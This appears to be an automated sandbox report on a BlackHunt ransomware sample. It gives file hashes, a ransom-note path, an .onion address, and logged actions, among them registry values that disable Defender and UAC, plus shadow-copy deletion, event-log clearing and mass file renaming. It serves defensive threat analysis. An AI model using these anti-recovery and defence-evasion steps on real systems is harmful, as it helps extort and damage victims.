Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:03
Static task
static1
Behavioral task
behavioral1
Sample
3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe
Resource
win10v2004-20231215-en
General
-
Target
3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe
-
Size
707KB
-
MD5
d661f0b9ee610b75f5040e392675801e
-
SHA1
203fc6ed12b4f999027a68a0a78eeac1eb480e1c
-
SHA256
3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a
-
SHA512
5ce6d2c6499579f30b6dfafea33f41eb7c7e7b83caaa96d7e66a28ef33a295a9f7247480365a61157292e9f7a5c2792bdf5ac0916e4d0359fa8e2481ae1b537f
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1Y81vnh:6uaTmkZJ+naie5OTamgEoKxLWTxh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2668 fsutil.exe 3724 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 4024 wevtutil.exe 2576 wevtutil.exe 3380 wevtutil.exe 3784 wevtutil.exe 3300 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1724 bcdedit.exe 1732 bcdedit.exe 3852 bcdedit.exe 3284 bcdedit.exe -
Renames multiple (2878) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2864 wbadmin.exe 4092 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3872 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\O: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\Z: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\Y: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\W: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\G: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\V: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\J: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\B: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\Q: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\L: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\X: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\M: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\R: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\P: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\S: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\K: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\H: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\T: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\I: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\A: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened (read-only) \??\N: 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\pl.txt 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.txt 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#BlackHunt_ReadMe.hta 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#BlackHunt_Private.key 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\VideoLAN\VLC\locale\it\#BlackHunt_ReadMe.txt 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#BlackHunt_Private.key 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#BlackHunt_ReadMe.hta 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_scrapbook_Thumbnail.bmp 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\#BlackHunt_ReadMe.hta 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files (x86)\Google\Update\Install\#BlackHunt_ReadMe.hta 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-core-io-ui.xml_hidden 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\release 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\#BlackHunt_ReadMe.hta 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#BlackHunt_Private.key 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#BlackHunt_ReadMe.hta 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#BlackHunt_ReadMe.hta 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_Private.key 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720x480icongraphic.png 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\COPYRIGHT 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_Private.key 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\VideoLAN\VLC\locale\my\#BlackHunt_ReadMe.txt 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#BlackHunt_Private.key 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_ReadMe.hta 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_Private.key 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sendopts.xml 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#BlackHunt_ReadMe.hta 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\Java\jre7\lib\zi\#BlackHunt_ReadMe.txt 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#BlackHunt_ReadMe.txt 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_scene.wmv 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_Private.key 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#BlackHunt_ReadMe.hta 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1200 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 640 vssadmin.exe 3892 vssadmin.exe 2732 vssadmin.exe 2088 vssadmin.exe 1008 vssadmin.exe 2628 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3900 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3756 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2216 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe Token: SeRestorePrivilege 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe Token: SeBackupPrivilege 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe Token: SeTakeOwnershipPrivilege 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe Token: SeAuditPrivilege 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe Token: SeSecurityPrivilege 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe Token: SeIncBasePriorityPrivilege 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe Token: SeBackupPrivilege 3044 vssvc.exe Token: SeBackupPrivilege 1740 wbengine.exe Token: SeRestorePrivilege 1740 wbengine.exe Token: SeRestorePrivilege 3044 vssvc.exe Token: SeAuditPrivilege 3044 vssvc.exe Token: SeSecurityPrivilege 1740 wbengine.exe Token: SeSecurityPrivilege 2576 wevtutil.exe Token: SeSecurityPrivilege 3380 wevtutil.exe Token: SeBackupPrivilege 2576 wevtutil.exe Token: SeBackupPrivilege 3380 wevtutil.exe Token: SeSecurityPrivilege 3784 wevtutil.exe Token: SeBackupPrivilege 3784 wevtutil.exe Token: SeSecurityPrivilege 3300 wevtutil.exe Token: SeBackupPrivilege 3300 wevtutil.exe Token: SeSecurityPrivilege 4024 wevtutil.exe Token: SeBackupPrivilege 4024 wevtutil.exe Token: SeDebugPrivilege 3900 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1700 wrote to memory of 2044 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 29 PID 1700 wrote to memory of 2044 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 29 PID 1700 wrote to memory of 2044 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 29 PID 1700 wrote to memory of 2044 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 29 PID 1700 wrote to memory of 2844 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 31 PID 1700 wrote to memory of 2844 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 31 PID 1700 wrote to memory of 2844 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 31 PID 1700 wrote to memory of 2844 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 31 PID 1700 wrote to memory of 1912 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 33 PID 1700 wrote to memory of 1912 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 33 PID 1700 wrote to memory of 1912 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 33 PID 1700 wrote to memory of 1912 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 33 PID 1700 wrote to memory of 2704 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 35 PID 1700 wrote to memory of 2704 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 35 PID 1700 wrote to memory of 2704 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 35 PID 1700 wrote to memory of 2704 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 35 PID 2044 wrote to memory of 2752 2044 cmd.exe 37 PID 2044 wrote to memory of 2752 2044 cmd.exe 37 PID 2044 wrote to memory of 2752 2044 cmd.exe 37 PID 1700 wrote to memory of 2772 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 38 PID 1700 wrote to memory of 2772 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 38 PID 1700 wrote to memory of 2772 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 38 PID 1700 wrote to memory of 2772 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 38 PID 1700 wrote to memory of 2756 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 40 PID 1700 wrote to memory of 2756 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 40 PID 1700 wrote to memory of 2756 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 40 PID 1700 wrote to memory of 2756 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 40 PID 2844 wrote to memory of 2684 2844 cmd.exe 42 PID 2844 wrote to memory of 2684 2844 cmd.exe 42 PID 2844 wrote to memory of 2684 2844 cmd.exe 42 PID 1700 wrote to memory of 2832 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 43 PID 1700 wrote to memory of 2832 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 43 PID 1700 wrote to memory of 2832 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 43 PID 1700 wrote to memory of 2832 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 43 PID 1700 wrote to memory of 2824 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 44 PID 1700 wrote to memory of 2824 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 44 PID 1700 wrote to memory of 2824 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 44 PID 1700 wrote to memory of 2824 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 44 PID 1912 wrote to memory of 2436 1912 cmd.exe 46 PID 1912 wrote to memory of 2436 1912 cmd.exe 46 PID 1912 wrote to memory of 2436 1912 cmd.exe 46 PID 1700 wrote to memory of 2748 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 47 PID 1700 wrote to memory of 2748 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 47 PID 1700 wrote to memory of 2748 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 47 PID 1700 wrote to memory of 2748 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 47 PID 1700 wrote to memory of 2720 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 49 PID 1700 wrote to memory of 2720 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 49 PID 1700 wrote to memory of 2720 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 49 PID 1700 wrote to memory of 2720 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 49 PID 1700 wrote to memory of 2852 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 50 PID 1700 wrote to memory of 2852 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 50 PID 1700 wrote to memory of 2852 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 50 PID 1700 wrote to memory of 2852 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 50 PID 1700 wrote to memory of 2220 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 53 PID 1700 wrote to memory of 2220 1700 3969dfc4cd53a05555cbd51e54e83ce30717138bd6c318fcbd02868c8392df6a.exe 